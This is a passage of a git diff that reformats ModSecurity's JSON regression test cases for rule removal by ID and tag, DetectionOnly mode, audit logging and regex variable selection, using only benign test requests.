"url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule: 913102. Executing operator", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913102,phase:request,pass,nolog,t:none,msg:'whee'\"" ] diff --git a/test/test-cases/regression/issue-1960.json b/test/test-cases/regression/issue-1960.json index 5b288977cd..14de7d66d4 100644 --- a/test/test-cases/regression/issue-1960.json +++ b/test/test-cases/regression/issue-1960.json @@ -1,37 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleEngine DetectionOnly with disruptive SecDefaultAction", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleEngine DetectionOnly with disruptive SecDefaultAction", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host": "localhost" + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0" }, - "uri":"?a=a", - "method":"GET" + "uri": "?a=a", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecDefaultAction \"phase:1,deny,status:403\"", "SecRule ARGS \"@rx a\" \"id:1,phase:1,block" diff --git a/test/test-cases/regression/issue-2000.json b/test/test-cases/regression/issue-2000.json index 05610b457d..4e7972a3a3 100644 --- a/test/test-cases/regression/issue-2000.json +++ b/test/test-cases/regression/issue-2000.json @@ -1,35 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log part H should output when deny - issue-2000", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log part H should output when deny - issue-2000", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, - "expected": { - "http_code": 403, - "audit_log": "id \"1234" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - - "server":{ - "ip":"127.0.0.1", - "port":80 + "expected": { + "audit_log": "id \"1234", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2099.json b/test/test-cases/regression/issue-2099.json index fff4aa4cc8..2b56572536 100644 --- a/test/test-cases/regression/issue-2099.json +++ b/test/test-cases/regression/issue-2099.json @@ -1,195 +1,260 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", - "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:9003100,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=941000-942999,ctl:ruleRemoveById=951000-951999,ctl:ruleRemoveById=953100-953130,ctl:ruleRemoveById=920420,ctl:ruleRemoveById=920440\"", + "SecRule ARGS \"@contains foo\" \"id:951001,phase:2,t:none,drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/remote.php/webdav?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php/webdav?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag against - issue 2099", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/remote.php?bar=foo", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", - "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/remote.php?bar=foo", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_FILENAME \"@contains /remote.php/webdav\" \"id:1000001,phase:2,pass,t:none,nolog,ctl:ruleRemoveByTag=attack-injection-php,ctl:ruleRemoveById=1100000-2100000,ctl:ruleRemoveById=9990000\"", + "SecRule ARGS \"@contains foo\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag - issue 2099", - "expected":{ - "http_code":200 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/test.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/test.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveTargetByTag against - issue 2099", - "expected":{ - "http_code":403 - }, - "client":{ - "ip":"1.2.3.4", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveTargetByTag against - issue 2099", + "client": { + "ip": "1.2.3.4", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/index.php?a=a", - "method":"GET", - "body": "" - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", - "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" + "uri": "/index.php?a=a", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_URI \"@contains /test.php\" \"id:100,phase:1,nolog,pass,ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:a,ctl:ruleRemoveTargetByTag=attack-rce;ARGS:a\"", + "SecRule ARGS \"@contains a\" \"id:4400000,tag:'attack-injection-php',phase:2,t:none,msg:'test rule',drop\"" ] - } + } ] - diff --git a/test/test-cases/regression/issue-2111.json b/test/test-cases/regression/issue-2111.json index c3faa7d216..faa8fc6aa8 100644 --- a/test/test-cases/regression/issue-2111.json +++ b/test/test-cases/regression/issue-2111.json @@ -1,33 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveById with range - issue 1444", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveById with range - issue 1444", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"index.php?foo=bar&z=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&z=xxx", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"127.0.0.1", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", - "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:foo \"@rx ^bar$\" \"id:100,phase:1,ctl:ruleRemoveById=200-1999\"", + "SecRule ARGS:z \"@rx ^xxx$\" \"id:1010,phase:1,deny,status:403\"" ] } ] diff --git a/test/test-cases/regression/issue-2196.json b/test/test-cases/regression/issue-2196.json index 44347bd08d..83f142f452 100644 --- a/test/test-cases/regression/issue-2196.json +++ b/test/test-cases/regression/issue-2196.json @@ -1,35 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing audit log not written when nolog - issue-2196", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing audit log not written when nolog - issue-2196", + "client": { + "ip": "127.0.0.1", + "port": 123 }, - "client":{ - "ip":"127.0.0.1", - "port":123 + "server": { + "ip": "127.0.0.1", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"index.php?foo=bar&a=xxx", - "method":"GET", - "body": "" + "uri": "index.php?foo=bar&a=xxx", + "method": "GET", + "body": [ + "" + ] }, - "expected": { - "http_code": 200, - "audit_log": "\\A[\\s\\S]{0}\\z" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - - "server":{ - "ip":"127.0.0.1", - "port":80 + "expected": { + "audit_log": "\\A[\\s\\S]{0}\\z", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAuditLogParts ABIJDEFHZ", "SecAuditEngine RelevantOnly", diff --git a/test/test-cases/regression/issue-2296.json b/test/test-cases/regression/issue-2296.json index bc64d19bd2..4947aee1c1 100644 --- a/test/test-cases/regression/issue-2296.json +++ b/test/test-cases/regression/issue-2296.json @@ -1,433 +1,472 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (1/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (1/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"Operator `Rx' with parameter `test' against variable `ARGS:THIS'" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "Operator `Rx' with parameter `test' against variable `ARGS:THIS'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression (2/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression (2/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Rule returned 0", - "error_log":"" + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIz$/ \"test\" \"id:1,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - msg (3/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - msg (3/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - matched_vars (4/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - matched_vars (4/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200, - "debug_log":"Target value: \"is a simple test\"", - "error_log":"msg \"Testing is a simple test\"" + "expected": { + "debug_log": "Target value: \"is a simple test\"", + "error_log": "msg \"Testing is a simple test\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS:/^ThIs$/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - rule (5/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - rule (5/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":403, - "debug_log":"Target value: .1. .Variable: RULE:id.", - "error_log":"Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' ." + "expected": { + "debug_log": "Target value: .1. .Variable: RULE:id.", + "error_log": "Operator `Rx' with parameter `1' against variable `RULE:id' .Value: `1' .", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule RULE:/^Id$/ \"1\" \"id:1,msg:'Testing %{RULE.id}% -- ',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (6/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (6/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ 